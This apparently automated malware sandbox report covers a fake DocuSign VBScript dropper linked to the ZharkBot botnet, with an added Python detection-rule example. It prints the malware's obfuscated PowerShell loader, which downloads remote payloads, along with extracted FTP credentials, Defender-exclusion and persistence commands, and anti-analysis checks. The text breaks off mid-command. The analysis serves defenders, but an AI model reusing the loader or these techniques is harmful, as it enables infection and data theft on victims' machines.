Analysis

  • max time kernel
    144s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20-11-2024 11:42

General

  • Target

    DocuSign01210021100.vbs

  • Size

    117KB

  • MD5

    09b37aa6f30c0b1d83529d21212f416c

  • SHA1

    c1d1d0159bc1a8bb36c4a078ea653531707d27c0

  • SHA256

    b28413ca3c1fa5b50a96d5e9afc5e365efd8ac6be834e82b25c5bf323284f774

  • SHA512

    b87bd64f420b21ac3f68f1aa069c0569a3e685f29f55b86527a020a8ee91e0f4b3c0f1b368ed4d63240608dc59dff8b8cff191a2812833f36b9f298ae803de7b

  • SSDEEP

    1536:pwwwwwwwwQ+xgv0zmbqGwwwwwwwwwwwwwwwwwr:iu

Malware Config

Extracted

  • Language
    ps1
  • Source
    exe.dropper
  • URLs
    https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    fYudY1578@@@@@@

Signatures

  • Detects ZharkBot payload 3 IoCs

    ZharkBot is a botnet written in C++.

  • ZharkBot

    ZharkBot is a botnet written in C++.

  • Zharkbot family
  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs

    Uses the powershell.exe command interpreter.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Adds Run key to start application 2 TTPs 10 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 2 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs
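
Added example, not part of the sandbox report: the signatures above are behaviours that a process-creation source records (Sysmon Event ID 1, or Security 4688 with command-line auditing), so the Python below turns them into a small rule set that runs over exported (pid, parent image, image, command line) rows. The sample rows are constructed from the command lines in this report's Processes section, with long paths and the Base64 blob abridged, plus one benign control row; the `ProcessEvent` shape and the rule names are this example's own, not report fields.

```python
"""Command-line detection for the behaviours this report lists under Signatures.

Added example, not part of the sandbox report. ProcessEvent rows are what a
process-creation source (Sysmon Event ID 1, Security 4688 with command-line
auditing) exports; the sample rows below are constructed from the command
lines in this report's Processes section (long paths and the Base64 blob
abridged) plus one benign control row. Rule names are this example's own.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\WScript.exe"

# (rule name, case-insensitive regex over the command line)
RULES = [
    # Hide Artifacts: Hidden Window plus policy bypass in one PowerShell invocation
    ("ps_hidden_bypass", re.compile(
        r"-WindowStyle\s+Hidden.*-ExecutionPolicy\s+Bypass"
        r"|-ExecutionPolicy\s+Bypass.*-WindowStyle\s+Hidden", re.I)),
    # A .ps1 run from a user-writable AppData location
    ("ps_script_in_appdata", re.compile(
        r"-file\s+['\"]?[^'\"]*\\AppData\\(?:LocalLow|Roaming|Local\\Temp)\\[^'\"]*\.ps1", re.I)),
    # Defender exclusion added from the command line (PIDs 4900 and 3348 in the tree)
    ("defender_exclusion", re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    # Persistence via the per-user Startup folder
    ("startup_folder_copy", re.compile(r"Copy-Item.*Start Menu\\Programs\\Startup", re.I)),
    # TLS certificate validation switched off before downloading
    ("tls_validation_disabled", re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    # Sandbox / analyst tooling check
    ("analysis_tool_check", re.compile(r"get-process\s+['\"]?(?:Wireshark|apateDNS)", re.I)),
]


def evaluate(events):
    """Return (pid, rule) pairs for every rule that fires on an event."""
    findings = []
    for ev in events:
        # Script host spawning PowerShell (WScript.exe PID 4184 -> PID 5112)
        if (ev.parent_image.lower().endswith("wscript.exe")
                and ev.image.lower().endswith("powershell.exe")):
            findings.append((ev.pid, "wscript_spawns_powershell"))
        for name, rx in RULES:
            if rx.search(ev.command_line):
                findings.append((ev.pid, name))
    return findings


def summarize(events):
    """Map each flagged PID to the sorted list of rule names it triggered."""
    out = {}
    for pid, name in evaluate(events):
        out.setdefault(pid, set()).add(name)
    return {pid: sorted(names) for pid, names in out.items()}


# Constructed from the report's process tree; command lines abridged.
EVENTS = [
    ProcessEvent(5112, WSCRIPT, PS,
        r"powershell.exe -command $mwxpv = 'Ow' + [char]66 + '9ADsAIA' ; powershell $ybsbt"),
    ProcessEvent(1308, PS, PS,
        r"powershell.exe ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\DocuSign01210021100.vbs'"
        r" -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;"
        r" [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;"
        r" if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; }"),
    ProcessEvent(4900, PS, PS,
        r"powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;"),
    ProcessEvent(2240, PS, PS,
        r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass'
        r' -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\gaduf.ps1"'),
    ProcessEvent(4292, PS, PS,
        r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\pesister.ps1'),
    # Benign control row (constructed): an interactive one-liner started from Explorer
    ProcessEvent(9999, r"C:\Windows\explorer.exe", PS, r"powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for pid, names in sorted(summarize(EVENTS).items()):
        print(pid, ", ".join(names))
```

The benign row exists to show that a plain `-Command` invocation from Explorer triggers nothing; the parent/child rule is the one that is hardest for the malware to avoid, since the .vbs must hand off to PowerShell somehow, while the command-line regexes are cheap to evade and should be treated as enrichment rather than the sole trigger.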

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DocuSign01210021100.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $mwxpv = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAGcAUg' + [char]66 + 'EAE8ATQAkADsAIAApACcAMQ' + [char]66 + 'zAHAALgAzADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAA7ACcAOwApACAAKQAgACAAJwAnAG0Acw' + [char]66 + '' + [char]66 + 'AGcAZQ' + [char]66 + 'SAEQARAAgAEQAJwAnACAAIAAsACAATQ' + [char]66 + 'vAHcATg' + [char]66 + 'zACQAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'jAG8Abg' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAbg' + [char]66 + 'jAGEAbg' + [char]66 + 'jAHUAbgAuAGMAbw' + [char]66 + 'tAC8AYgAuAHQAeA' + [char]66 + '0ACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAZw' + [char]66 + 'SAEQATw' + [char]66 + 'NACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + 
'0AGUARwAnACAAPQArACAAZw' + [char]66 + 'SAEQATw' + [char]66 + 'NACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAnACAAPQArACAAZw' + [char]66 + 'SAEQATw' + [char]66 + 'NACQAOwAgACcAOwAgACkAIAApACcAJw' + [char]66 + '' + [char]66 + 'ACcAJwAsACcAJwCTIToAkyEnACcAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'yAC4ARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'zAFsAIAA9ACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAJwAgAD0AKwAgAGcAUg' + [char]66 + 'EAE8ATQAkADsAIAAnADsAKQA4AEYAVA' + [char]66 + 'VACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIAAnACAAKwAgAGwARw' + [char]66 + 'mAFQAUwAkACAAKwAgACcAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAKAAgAD0AIA' + [char]66 + 'HAGUAYQ' + [char]66 + '5AHIAJAAgADsAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAA9ACAATQ' + [char]66 + 'vAHcATg' + [char]66 + 'zACQAJwAgACAAPQAgAGcAUg' + [char]66 + 'EAE8ATQAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgAGwARw' + [char]66 + 'mAFQAUwAkACAAaA' + [char]66 + '0AGEAUA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AdA' + [char]66 + '1AE8AIA' + [char]66 + '8ACAAeg' + [char]66 + 'IAGwAVA' + [char]66 + '1ACQAOwAgACkAIA' + [char]66 + '' + [char]66 + 'AFUAeg' + [char]66 + 'IAEQAJAAgACgAZw' + 
[char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAIAA9ACAAeg' + [char]66 + 'IAGwAVA' + [char]66 + '1ACQAOwAgACkAIA' + [char]66 + 'RAEcAcA' + [char]66 + 'lAEkAJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAgACgAIAA9ACAAIA' + [char]66 + '' + [char]66 + 'AFUAeg' + [char]66 + 'IAEQAJAA7ACAAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'OAGwAcg' + [char]66 + 'oAFAAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + 'OAGwAcg' + [char]66 + 'oAFAAJAA7ACAAKQAnAHQAeA' + [char]66 + '0AC4AMgAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAbA' + [char]66 + 'HAGYAVA' + [char]66 + 'TACQAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAJwA4AEYAVA' + [char]66 + 'VACcAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALQAgAFEARw' + [char]66 + 'wAGUASQAkACAAaA' + [char]66 + '0AGEAUA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AdA' + [char]66 + '1AE8AIA' + [char]66 + '8ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAIA' + [char]66 + 'zAGsAcA' + [char]66 + 'zAGYAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' 
+ [char]66 + 'lAHcAJAAgAD0AIA' + [char]66 + '2AFgAVQ' + [char]66 + 'WAFIAJAA7ACAAKQ' + [char]66 + 'xAEcAbA' + [char]66 + 'sAGwAJAAgACwAUA' + [char]66 + 'SAHIAag' + [char]66 + 'PACQAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAGsAcg' + [char]66 + 'vAHcAdA' + [char]66 + 'lAE4ALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8ALQ' + [char]66 + '3AGUAbgAgAD0AIA' + [char]66 + 'zAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALg' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACAAPQAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAOwAgACkAKQAgADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADYANQAgACwANQA1ACAALAAzADUAIAAsADkANAAgACwAOQA4ACAALAAwADAAMQAgACwANwAxADEAIAAsADkAOAAgACwAMgAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAgAD0AIA' + [char]66 + 'xAEcAbA' + [char]66 + 'sAGwAJAA7ACAAKQApADkANAAsADYAMQAxACwANwA5ACwANAAxADEALAA4ADkALAA4ADEAMQAsADcAMAAxACwAOQA5ACwANQAxADEALAAxADAAMQAsADAAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAUA' + [char]66 + 'SAHIAag' + [char]66 + 'PACQAOwApACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'RAEcAcA' + [char]66 + 'lAEkAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 
'EAC8AMQAwAC8AJwAgACsAIAAnAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC4AcA' + [char]66 + '0AGYAQAAxAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALwAvADoAcA' + [char]66 + '0AGYAJwAoACAAPQAgAHMAaw' + [char]66 + 'wAHMAZgAkADsAfQAgAAoADQA7AHQAaQ' + [char]66 + '4AGUAIAAgACAAIAAgACAACgANADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgAHIAZQ' + [char]66 + '0AHUAcA' + [char]66 + 'tAG8AQwAtAHQAcg' + [char]66 + 'hAHQAcw' + [char]66 + 'lAFIACgANACAAew' + [char]66 + 'lAHMAbA' + [char]66 + 'lAAoADQAKAA0AfQAKAA0AIAAgACAAIAAgACAAIAAKAA0AIA' + [char]66 + '7ACkAbA' + [char]66 + 'sAHUATgAkACAAcQ' + [char]66 + 'lAC0AIAApAGUAdQ' + [char]66 + 'uAGkAdA' + [char]66 + 'uAG8AQw' + [char]66 + '5AGwAdA' + [char]66 + 'uAGUAbA' + [char]66 + 'pAFMAIA' + [char]66 + 'hAGUALQAgACcAZQ' + [char]66 + '6AHkAbA' + [char]66 + 'hAG4AYQAnACwAJw' + [char]66 + 'TAE4ARA' + [char]66 + 'lAHQAYQ' + [char]66 + 'wAGEAJwAsACcAaw' + [char]66 + 'yAGEAaA' + [char]66 + 'zAGUAcg' + [char]66 + 'pAFcAJwAgAHMAcw' + [char]66 + 'lAGMAbw' + [char]66 + 'yAHAALQ' + [char]66 + '0AGUAZwAoACgAZg' + [char]66 + 'pADsAIAAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACAAfQ' + [char]66 + 'lAHUAcg' + [char]66 + '0ACQAewAgAD0AIA' + [char]66 + 'rAGMAYQ' + 
[char]66 + 'iAGwAbA' + [char]66 + 'hAEMAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAGQAaQ' + [char]66 + 'sAGEAVg' + [char]66 + 'lAHQAYQ' + [char]66 + 'jAGkAZg' + [char]66 + 'pAHQAcg' + [char]66 + 'lAEMAcg' + [char]66 + 'lAHYAcg' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWw' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ACAAZgAvACAAMAAgAHQALwAgAHIALwAgAGUAeA' + [char]66 + 'lAC4Abg' + [char]66 + '3AG8AZA' + [char]66 + '0AHUAaA' + [char]66 + 'zACAAOwAnADAAOAAxACAAcA' + [char]66 + 'lAGUAbA' + [char]66 + 'zACcAIA' + [char]66 + 'kAG4AYQ' + [char]66 + 'tAG0Abw' + [char]66 + 'jAC0AIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAKQAgACcAcA' + [char]66 + '1AHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAbQ' + [char]66 + 'hAHIAZw' + [char]66 + 'vAHIAUA' + [char]66 + 'cAHUAbg' + [char]66 + 'lAE0AIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAHcAbw' + [char]66 + 'kAG4AaQ' + [char]66 + 'XAFwAdA' + [char]66 + 'mAG8Acw' + [char]66 + 'vAHIAYw' + [char]66 + 'pAE0AXA' + [char]66 + 'nAG4AaQ' + [char]66 + 'tAGEAbw' + [char]66 + 'SAFwAYQ' + [char]66 + '0AGEARA' + [char]66 + 'wAHAAQQ' + [char]66 + 'cACcAIAArACAARg' + [char]66 + 'rAFcAcA' + [char]66 + '0ACQAIAAoACAAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAG4AaQ' + [char]66 + '0AHMAZQ' + [char]66 + 'EAC0AIAAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAG0AZQ' + [char]66 + '0AEkALQ' + [char]66 + '5AHAAbw' + [char]66 + 'DACAAOwAgAHQAcg' + [char]66 + 'hAHQAcw' + [char]66 + 'lAHIAbw' + [char]66 + 'uAC8AIA' + [char]66 + '0AGUAaQ' + [char]66 + '1AHEALwAgAEIASA' + [char]66 + 'YAGgASAAgAGUAeA' + [char]66 + 'lAC4AYQ' + [char]66 + 'zAHUAdwAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + 
[char]66 + '3AG8AcAAgADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJAAoACAAPQAgAEIASA' + [char]66 + 'YAGgASAA7ACkAIA' + [char]66 + 'lAG0AYQ' + [char]66 + 'OAHIAZQ' + [char]66 + 'zAFUAOgA6AF0AdA' + [char]66 + 'uAGUAbQ' + [char]66 + 'uAG8Acg' + [char]66 + 'pAHYAbg' + [char]66 + 'FAFsAIAArACAAJw' + [char]66 + 'cAHMAcg' + [char]66 + 'lAHMAVQ' + [char]66 + 'cADoAQwAnACgAIAA9ACAARg' + [char]66 + 'rAFcAcA' + [char]66 + '0ACQAOwApACAAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJAAoACAALA' + [char]66 + '5AHIAbQ' + [char]66 + 'kAGcAJAAoAGUAbA' + [char]66 + 'pAEYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AbQ' + [char]66 + 'oAGcAZw' + [char]66 + '6ACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAG0AaA' + [char]66 + 'nAGcAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAG0AaA' + [char]66 + 'nAGcAegAkADsAfQA7ACAAKQAnAHcANQAwAFoAMQA4AHUAYwA3AFoATQ' + [char]66 + 'LADgAOA' + [char]66 + 'nAGUAdA' + [char]66 + 'oAGoAbg' + [char]66 + '' + [char]66 + 'AHAAagAxAEwAQgAtADQAeQ' + [char]66 + 'IAGEAYQAxACcAIAArACAAeQ' + [char]66 + 'yAG0AZA' + [char]66 + 'nACQAKAAgAD0AIA' + [char]66 + '5AHIAbQ' + [char]66 + 'kAGcAJA' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ADsAIAApACcAVg' + [char]66 + 'FAFMAZA' + [char]66 + 'qAHcAVQA5ADUAUgAtAFcAcw' + [char]66 + 'ZAHUAWg' + [char]66 + 'MAGkAdw' + [char]66 + 'yAGIANQ' + [char]66 + 'ZAE4AUQAtAEgAag' + [char]66 + 'yAGIAMg' + [char]66 + 'wADEAJwAgACsAIA' + [char]66 + '5AHIAbQ' + [char]66 + 
'kAGcAJAAoACAAPQAgAHkAcg' + [char]66 + 'tAGQAZwAkAHsAIAApACAAYg' + [char]66 + 'RAFUAaQ' + [char]66 + 'QACQAIAAoACAAZg' + [char]66 + 'pADsAIAApACcANAA2ACcAKA' + [char]66 + 'zAG4AaQ' + [char]66 + 'hAHQAbg' + [char]66 + 'vAEMALg' + [char]66 + 'FAFIAVQ' + [char]66 + 'UAEMARQ' + [char]66 + 'UAEkASA' + [char]66 + 'DAFIAQQ' + [char]66 + 'fAFIATw' + [char]66 + 'TAFMARQ' + [char]66 + 'DAE8AUg' + [char]66 + 'QADoAdg' + [char]66 + 'uAGUAJAAgAD0AIA' + [char]66 + 'iAFEAVQ' + [char]66 + 'pAFAAJAA7ACcAPQ' + [char]66 + 'kAGkAJg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAGQAPQ' + [char]66 + '0AHIAbw' + [char]66 + 'wAHgAZQA/AGMAdQAvAG0Abw' + [char]66 + 'jAC4AZQ' + [char]66 + 'sAGcAbw' + [char]66 + 'vAGcALg' + [char]66 + 'lAHYAaQ' + [char]66 + 'yAGQALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAIAA9ACAAeQ' + [char]66 + 'yAG0AZA' + [char]66 + 'nACQAOwApACAAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAIAAoACAAbA' + [char]66 + 'lAGQAOwApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 